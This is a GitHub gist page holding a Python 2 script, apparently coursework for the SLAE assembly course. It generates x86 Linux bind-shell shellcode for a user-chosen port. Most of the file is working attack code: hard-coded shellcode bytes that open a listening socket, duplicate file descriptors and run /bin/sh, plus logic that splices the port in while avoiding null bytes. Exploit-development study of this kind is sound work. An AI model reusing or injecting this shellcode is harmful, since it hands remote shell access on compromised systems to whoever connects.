Created
May 25, 2017 08:05
-
-
Save michaelnewton/cfc82fdd80bd97e9c6dbcaed8fc8eee3 to your computer and use it in GitHub Desktop.
SLAE Assignment #1 - Bind Shellcode Generator
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python | |
# Cut the shellcode apart at the point of the port declaration for assembly later. | |
shellcodefront = r"\x6a\x66\x58\x6a\x01\x5b\x31\xc9\x51\x53\x6a\x02\x89\xe1\xcd\x80\x92\x43\x56\x66\x68" | |
shellcodeback = r"\x66\x53\x89\xe1\x6a\x10\x51\x52\x89\xe1\xb0\x66\xcd\x80\x31\xc0\xb0\x66\xb3\x04\x57\x52\x89\xe1\xcd\x80\xb0\x66\x43\x57\x52\x89\xe1\xcd\x80\x31\xc9\xb1\x02\x93\x31\xc0\x6a\x3f\x58\xcd\x80\x49\x79\xf8\x57\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x31\xd2\xb0\x0b\xcd\x80" | |
while True: | |
print "+------------------------------------+" | |
print "| Bind Shellcode |" | |
print "| SLAE Assignment #1 SLAE-895 |" | |
print "| Generator Script 1.0 |" | |
print "+------------------------------------+\n" | |
portnum = raw_input("Enter the port number to bind to: ") | |
port4x = format(int(portnum), '04x') # Change the format of the input to hex bytes | |
if port4x[0:2:] != "00" : # Validate the first byte of the port is not null | |
if port4x[2:4:] != "00" : # Validate the second byte of the port is not null | |
custom_port="\\x"+port4x[0:2:]+"\\x"+port4x[2:4:] # Format the bytes as per our shellcode format | |
print "Port number to inject: "+custom_port+"\n" | |
print "Here is your shellcode:\n" | |
print shellcodefront+custom_port+shellcodeback+"\n" | |
if int(portnum) <= 1024 : # Check if port is lower than 1024 and issue a warning | |
print "Remember you need to be root to open this port!\n\n" | |
break | |
print "Invalid port chosen, port number " +portnum+ " creates a NULL byte, try another port greater than "+portnu m |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment